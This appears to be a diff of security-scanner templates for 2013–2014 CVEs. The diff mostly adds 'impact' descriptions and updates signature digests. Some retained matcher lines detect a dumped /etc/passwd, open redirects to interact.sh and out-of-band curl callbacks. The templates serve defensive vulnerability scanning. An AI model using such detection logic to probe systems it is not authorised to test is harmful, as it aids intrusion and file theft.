+# digest: 4a0a0047304502205601fb089b44d0324d4e78d34a355a1a218e71359e2b5cccfec09dc0dac2a830022100b3ba8a79988f901347cb27d7c2fad60577fb0d5d51daa8e7900c2b108584ca81:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml
index cd6b420187..ef4a8e06bc 100644
--- a/http/cves/2013/CVE-2013-2287.yaml
+++ b/http/cves/2013/CVE-2013-2287.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: Multiple cross-site scripting  vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update to the latest version of the WordPress Plugin Uploader or apply a patch provided by the vendor to fix the XSS vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c8c5559368df444abe62727c1b90f86dd61fc41a85a3649cd579fb795fb172160221008d258e921ba29a6ed61ab268d0ef5889e4635040d37eb6f4bc9f2f5cf2260214:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100df23b384d625e0c6b32964a3d6e3dd96f8a526e7423cfabb76e505554d75e8570221008663e84f3f5b73473b8bd3ec89c06b3b405ddeb7de0acc8e93238ccc461d9203:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml
index e01b95c4e0..cd0a6e533f 100644
--- a/http/cves/2013/CVE-2013-2621.yaml
+++ b/http/cves/2013/CVE-2013-2621.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Open Redirection Vulnerability in the redir.php script in Telaen before 1.3.1 allows remote attackers to redirect victims to arbitrary websites via a crafted URL.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
   remediation: |
     Upgrade to the latest version of Telaen to fix the open redirect vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 4a0a004730450220771c3c445edc036b096c72ceb4c3f7ab76e2e3f7179f89c16d3dae9172e55299022100a4671f0a22cda7c3b5e1443a76f3495f12d0798c17c996485db4971135a9b2b0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203356ff6dea12e2b33f72c0ce48ee00c534cd6e83cbe63d8174f9a71aec181166022007bf562e5422db455f87eeedfafd70e8516728a53184efff1ce66c5c8da0abab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml
index 00405aae0d..b755c01603 100644
--- a/http/cves/2013/CVE-2013-3526.yaml
+++ b/http/cves/2013/CVE-2013-3526.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter."
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a004730450221008d38745a716f14fcf8be4901d004c88e804dacec165db16ba953d21eaed28a9b0220324b395aa0fafbde5e2926c95fbcffc6c46a35339ceb0bd8f84478d05e97dc0c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206a15e3183061f1b6d48531d10690ab71d1bee82e4634f305ef652f7c1519e9bd022100d0a37a0600fffa5c115e587879a2add388e0aea59727297f4b8f2c8e6e0f48cb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml
index 842d119d41..53ebaa578c 100644
--- a/http/cves/2013/CVE-2013-4117.yaml
+++ b/http/cves/2013/CVE-2013-4117.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the WordPress Plugin Category Grid View Gallery or apply the provided patch to fix the XSS vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022068800cf5afc60f6f0e1164c51e41eda0bb73e4971bf1af1d2784b7037836ae6f022100e7db26c03f4a1f3b610d0c4702a75ef1e06c4886b069bd80e0e94a15243d31e3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d4b3fcbb4906b19001cf72d4aad9add7b544041dd97c0ccf35838cff913a8a6e022100e24d898f72a403c58117f0da9ad80377007fd8687238e628cc2cd9cd792380e7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml
index 3fca69a6a3..dc3fb151c8 100644
--- a/http/cves/2013/CVE-2013-4625.yaml
+++ b/http/cves/2013/CVE-2013-4625.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting  vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the target website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: Upgrade to Duplicator 0.4.5 or later.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2013-4625
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022009fbb02a9a71ecffbb55ff0944e4a4ff387b2f303ce2ee21f6f8b9f98d374bb4022100c0b21c5c731a94ae9a9d71f6944e2d6fd25af70898f217ea5ca0cf43f13c83d8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205afc0558c0a5c6f4e156350413787049ba55798abafb3a473caf199566a9d3f1022100dc757c0322a69f872070597ce88eee1b95028c408b4666a3df83e0b817802a6c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml
index 695d7d305b..d60c8c4129 100644
--- a/http/cves/2013/CVE-2013-5528.yaml
+++ b/http/cves/2013/CVE-2013-5528.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to access sensitive files and directories on the affected system.
   remediation: |
     Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100d8b211bbf2d055c923e844409e533f28eace705338e0568d7366a8f2e9c8edf9022100ffcf103a8fd7651cce24bfb0dad2fac7146dc0a1be8ab48a0af6184f3c5a57a4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008e02f05197668a2896c4ce3329cfaa33626f88728c4b26081575c062dfa2793b02202da67d420e04a0893e7789fa280484696fae3e87c216e5c8035aa45364e2f2b7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml
index 911bd4082f..707d599fc7 100644
--- a/http/cves/2013/CVE-2013-5979.yaml
+++ b/http/cves/2013/CVE-2013-5979.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.
+  impact: |
+    An attacker can read arbitrary files on the server.
   remediation: |
     Upgrade to a patched version of Xibo.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402200c58d020adab1b1dfd869b74002807b5e9a9ca787592efc85a821b51b6e1ca7002200f60351e13c43af53469514345318f4821ebddbfcb867645099ee962dcb86c7e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100866349d738228669609abe425094cd153a1465586d479ca9fec10db9a7c55c6b022100bb0fae43b502e3c8e6ef60a28d6c47c46d9144a35373d5a29573f694cafb7cb1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml
index 1868b18c60..1a97f266f0 100644
--- a/http/cves/2013/CVE-2013-6281.yaml
+++ b/http/cves/2013/CVE-2013-6281.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected WordPress site, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update the WordPress Spreadsheet plugin to the latest version, which includes proper input sanitization to mitigate the XSS vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402206dbbab28b5db438ede1d0ef39a4413883c23469116fec3a4dd469bf0aea9b6f902203d15d44466fa6aef6ff238b0c5506ddfd2913ce1bb78c9c4fa16a04e427d0a5e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cb01e00698300e21d7fd11d10a0bf78683b0c5f5f328e786164354303b69274b022100935646da48b55b5db44efc49b96a770beb700b40087946eb988e934c9fd4cf2e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml
index 46259a3fcd..f2bc6a6480 100644
--- a/http/cves/2013/CVE-2013-7091.yaml
+++ b/http/cves/2013/CVE-2013-7091.yaml
@@ -5,6 +5,8 @@ info:
   author: rubina119
   severity: medium
   description: A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Apply the latest security patches or upgrade to a newer version of Zimbra Collaboration Server to mitigate the LFI vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: regex
         regex:
           - "root=.*:0:0"
-# digest: 4a0a004730450220291a98fd27d95cd20ab4c8ccc8b963594c4b98191fffaba69aea60935b679d4f022100997a0fe4ab10f1ce3290561c6493b20090995a89804aa48f6a64f09704570d7b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100af34e7a9486944cdae869b27f5e277ef9ac9ccf9f3694aa8dbbc6231d81abc8602204e21dbc6719c5177611e0f4136f31ff3b46026159d00b25924d61f1f058214b9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml
index 869b6713d8..56e3304741 100644
--- a/http/cves/2013/CVE-2013-7240.yaml
+++ b/http/cves/2013/CVE-2013-7240.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive files, potentially leading to unauthorized disclosure of sensitive information.
   remediation: |
     Update to the latest version of the Advanced Dewplayer plugin or remove it if it is not actively used.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203cfc2f397e914759fa35d7f3b88d6589dec3bede98abc314ffa17397519907c602210092a7cc7211769e7091ae5cd20ffad9d80fff14bc9a8faf7812e4ac27ac42e7e1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100df40bf2354f82b69e8a76d390759c896a2c448d1d2b1cb84bd760147b05a307b022100b74dfb8e99555fef5e06aff38e619f27e81e3dc434c317680b93351c1957cfdf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml
index 99b592b3a6..808e595179 100644
--- a/http/cves/2013/CVE-2013-7285.yaml
+++ b/http/cves/2013/CVE-2013-7285.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
   remediation: |
     Upgrade XStream to version 1.4.10 or later to mitigate this vulnerability.
   reference:
@@ -62,4 +64,4 @@ http:
         part: interactsh_request
         words:
           - "User-Agent: curl"
-# digest: 4a0a00473045022032280c7a9d42721f188dec089c1ee99f5f68127ea5786903a21fbb207480e4ae022100e51e99eb751be529e78b5d77abf38f5461b361cae7ffb4be5feb19b11aca4ae5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100bea72ccdcaf18fa5328ff124392c4b1d40521fa73d440d3e27d7d0cf1884f00c022040c286187a757d6197352db014b2918f506fa65d89d6fc40e0e226be12e31d8c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-10037.yaml b/http/cves/2014/CVE-2014-10037.yaml
index 035b5d24d4..788156ebc0 100644
--- a/http/cves/2014/CVE-2014-10037.yaml
+++ b/http/cves/2014/CVE-2014-10037.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.
+  impact: |
+    An attacker can read, modify, or delete sensitive files on the server, potentially leading to unauthorized access or data leakage.
   remediation: |
     Upgrade to a patched version of DomPHP or apply the necessary security patches to fix the directory traversal vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221008b4a57b06aa557e7ea9ed17d4a7d15826d391fc2c21a83960acba0b05eae2955022100bf0c1d19aad3074a9b63fcaf3de8804a8dadc904d1cde41fdf6ccde3f8cb7ad4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022045409433be7fe4dffc9d3bfcdade34b30b7d644fbb543aa4ced8a3b0e9075a94022100b697303a0592ced1eb79a26f42db2290e48c6f95bde12e36dfd1154a9c3507a4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml
index 7d9f6a32d5..3cf15beb09 100644
--- a/http/cves/2014/CVE-2014-1203.yaml
+++ b/http/cves/2014/CVE-2014-1203.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Upgrade to a patched version of Eyou E-Mail <3.6 or apply the necessary security patches.
   reference:
@@ -44,4 +46,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402203b38c1f86652e3b47da1ff30382ff904a109850e88c3879f86338a3b02ef30de022042d77da62bf1e636a5399c26416f7b3b883be8e780a07e86c75cff77b455c5e7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100ec1ac8dd4ecf97532dc7d81827b73f01099fd3e1f104abcf31d5e1460d1f50d4022100b97d60ac30948ae48df5afdbba9358802b1be0d6ad69e6e497386080453a1da4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml
index f0fad9ba91..ef02d73f39 100644
--- a/http/cves/2014/CVE-2014-2321.yaml
+++ b/http/cves/2014/CVE-2014-2321.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials.
+  impact: |
+    Remote code execution
   remediation: |
     Apply the latest firmware update provided by ZTE to fix the vulnerability
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ba6eab655a6a72dc0f5e22d7614c07e57763637c61bd9077a44045f2b9549e30022072305cbf914a878b878d37da93d1e59127e44bb4843dac9142c2cd86b165e799:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a56607c8d1ec7cfd4719d48d9c7fa91e25869e904e929295fb180cd1ba872160022100c914c6b4fcd31ed17d817e7db1d5e08b6fddf7843b00c3275d66e27f480e4a37:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml
index ff9a8d86b2..1caa0c73a1 100644
--- a/http/cves/2014/CVE-2014-2323.yaml
+++ b/http/cves/2014/CVE-2014-2323.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: critical
   description: A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname).
+  impact: |
+    Successful exploitation of these vulnerabilities could lead to unauthorized access to sensitive data and remote code execution
   remediation: |
     Upgrade to a patched version of Lighttpd or apply the necessary security patches
   reference:
@@ -38,4 +40,4 @@ http:
       - type: regex
         regex:
           - "root:[x*]:0:0:"
-# digest: 4a0a00473045022100890bbb222dab6e6077d699ba000931239a2a22675c5458d681ecff738f9cf6cd022003e1995604726148f1ad10ae858fe5f2f9cdf321e8d51b4cd21998663f7b0165:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e0c790e1cbbd16a33270523f27a14fcfe82c2f99b9cb6d04774121f8f44cccad022100b328c3e67f5f85bd158b7701623a9ec68f2aed71f07a280422f15db73aaad1c5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml
index b968bc2120..4cb056a41d 100644
--- a/http/cves/2014/CVE-2014-2383.yaml
+++ b/http/cves/2014/CVE-2014-2383.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.
+  impact: |
+    The vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the affected system.
   remediation: |
     Upgrade Dompdf to a version higher than v0.6.0 to mitigate the vulnerability.
   reference:
@@ -62,4 +64,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100b1d97f4e572f4991277c3398217adc384a1c64bc9f2ee889c753ccde728996920221009cca24095bebb03123bcadfa95187ec3477a9e594914639ab93c860d7d30221f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203921743780724eb52c7bb0eb87f3d059097d2031b14f0ff098024e481f46880d022100a81e349caaee574d24461d7caf9a93dd9689fa550db17f0cb90b75c1d8e579ae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml
index eb286355f3..b0bf85d474 100644
--- a/http/cves/2014/CVE-2014-2908.yaml
+++ b/http/cves/2014/CVE-2014-2908.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser.
   remediation: Upgrade to v4.0 or later.
   reference:
     - https://www.exploit-db.com/exploits/44687
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502207ba0e73bc0ce934fe9ebb08cde6954c20a59e182fca6de51908fa368c743ae14022100d6dbc979178d3969162cafc3670a26a7bb6484f8b39bbc733c9a3b4413e2e107:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202c73948411560103b8f5c49014a2d1fff0ed14ddb5d4496f5cf0386ed7257d0e02206eefceed30f5e37d37d7999b4b123ecdfd39fb3cdf636ce94634a393478d6e25:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml
index 7856db4961..4a8fd9bfc1 100644
--- a/http/cves/2014/CVE-2014-2962.yaml
+++ b/http/cves/2014/CVE-2014-2962.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: high
   description: A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
+  impact: |
+    An attacker can exploit this vulnerability to view sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the system.
   remediation: Ensure that appropriate firewall rules are in place to restrict access to port 80/tcp from external untrusted sources.
   reference:
     - https://www.kb.cert.org/vuls/id/774788
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f2be013d1c42d4b50c06f2ed2da750c036e90d5c3727dc1de8c75032583ad05002207046f1a8a584c0535846644c9b97011c4a6123688982b6a7d3f34bba1048ff66:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022026d2b631fa942f9ee77f39d73bfdb3d19e300d528de9d66baa325b64e2577de0022023564b7c13017538b414f940c6f7292a043ec7a7398b7a13991edaca60bd9daa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml
index 8ae057065f..192fc321cd 100644
--- a/http/cves/2014/CVE-2014-3120.yaml
+++ b/http/cves/2014/CVE-2014-3120.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine.
+  impact: |
+    Allows remote attackers to execute arbitrary code on the affected system
   remediation: |
     Upgrade to a patched version of ElasticSearch
   reference:
@@ -69,4 +71,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100f577b5b343297961f96e7ae627c542a022d80387bb925978a1416e6c91c37ccf022100d1070f10c65ebfc0801549f3e8b5bdec8f4ba85867d562841cfc38ef67c655d5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b8ca32574dd1fadd9b74d9637ead80fe58001ea1f88c106c2bfdd3f56500029a022051065022f16e3bc022eb441be88bfcd018ff0fd07f36d969a9d67853867fc978:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml
index 8118fcc965..8aba1bbc10 100644
--- a/http/cves/2014/CVE-2014-3206.yaml
+++ b/http/cves/2014/CVE-2014-3206.yaml
@@ -5,6 +5,8 @@ info:
   author: gy741
   severity: critical
   description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands with the privileges of the affected device, potentially leading to unauthorized access, data loss, or further compromise of the network.
   remediation: |
     Apply the latest firmware update provided by Seagate to patch the command injection vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
         part: interactsh_protocol
         words:
           - "http"
-# digest: 4a0a00473045022100a666968c172582af935ab58097b0f389fe79771540a9c615f7e6eeaaa77081020220408d8f4d58dc6972cbb5714f79778cfe0c8e567ce616ed5a53bd8ad3a75dec1b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204b3de4b1566a99da648abc07da3b94ebb1860817b84793793d316480d01c7603022100a510f7edb5ed03f87310a9adebb01d4093ee3c3ce11da529ebe95d058998c325:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-3704.yaml b/http/cves/2014/CVE-2014-3704.yaml
index 3410bb45a9..30ed9237db 100644
--- a/http/cves/2014/CVE-2014-3704.yaml
+++ b/http/cves/2014/CVE-2014-3704.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: high
   description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Drupal application and its underlying database.
   remediation: Upgrade to Drupal core 7.32 or later.
   reference:
     - https://www.drupal.org/forum/newsletters/security-advisories-for-drupal-core/2014-10-15/sa-core-2014-005-drupal-core-sql
@@ -50,5 +52,4 @@ http:
       - type: status
         status:
           - 500
-
-# digest: 4b0a00483046022100b094a161539cda73a1fa7ffc6ad92c2a3d2c2aac71febb2e23b31add297e6ad7022100f18cac029bb2350c7c535eb3f6916a58404a976369d02a2508a7f55c5ef55728:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022019ad60102b0034cd9c4d9e39c2d9c0c3c811fc44980d37c077d538b6994da157022100ed831a5b94e4b5149514216eb9d04f4830ebd68ad61fde769efb3d379b4b80f3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml
index d60117e642..56201c5447 100644
--- a/http/cves/2014/CVE-2014-3744.yaml
+++ b/http/cves/2014/CVE-2014-3744.yaml
@@ -5,6 +5,8 @@ info:
   author: geeknik
   severity: high
   description: A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.
+  impact: |
+    An attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information.
   remediation: |
     Upgrade to a patched version of the st module or use an alternative module that is not vulnerable to directory traversal.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100c9c6f41ce1209254da302f99b3fd50eb51788681bb3ab134023f69191d1949c0022100b38f77e8e0b59aafa34c99254c974a867229356c7246ec576b3ef2902f3edf87:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ad1ca8124c95e2703cbb3cba50f3915085260371306caf5a373714b7a86f7b7c02200c1bc9db87baee85222934f05a0ec6eed0bdc9ae6370d1f5052eaa16ea09f85c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml
index b860fa12a1..240a63cf48 100644
--- a/http/cves/2014/CVE-2014-4210.yaml
+++ b/http/cves/2014/CVE-2014-4210.yaml
@@ -4,9 +4,11 @@ info:
   name: Oracle Weblogic - Server-Side Request Forgery
   author: princechaddha
   severity: medium
-  description: |
-    An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.
-  remediation: Apply the latest patches and updates provided by Oracle to fix the SSRF vulnerability
+  description: An unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to bypass network restrictions and access internal resources.
+  remediation: |
+    Apply the latest patches and updates provided by Oracle to fix the SSRF vulnerability
   reference:
